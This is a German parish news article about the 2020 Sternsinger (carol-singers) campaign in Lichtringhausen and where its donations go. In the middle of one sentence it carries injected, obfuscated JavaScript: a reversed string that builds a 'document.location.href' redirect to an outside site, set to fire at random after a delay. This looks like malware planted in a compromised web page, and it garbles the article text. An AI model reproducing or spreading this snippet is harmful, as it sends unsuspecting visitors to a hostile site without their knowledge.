Skip to content Skip to main navigation Skip to footer

Segen bringen – Segen sein! Sternsingeraktion 2020

Unter dem diesjährigen Motto „Segen bringen, Segen sein. Frieden! Im Libanon und weltweit!“ machten sich am 05.01.2020 bei trockenem aber kühlen Wetter nach dem Aussendungsgottesdienst  16 Sternsinger/innen aus der Kirchengemeinde St. Jakobus d. Ä. Lichtringhausen auf den Weg um Gottes Segen in die Häuser zu tragen.

Nach einer kleinen Stärkung mit Bockwürstchen, Brötchen und leckerer Suppe zum Aufwärmen wurden anschließend im Musikvereinshaus die Sammeltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dosen geleert. Der Erlös kommt neben den Projekten des Kindermissionswerks auch im Besonderen dem Projekt Straßenkinder in La Paz der Stiftung „ARCO IRIS“ von Pater Neuenhofer zugute. Die geschenkten Süßigkeiten wurden unter den Kindern aufgeteilt und auch einiges der „Tafel“ gespendet.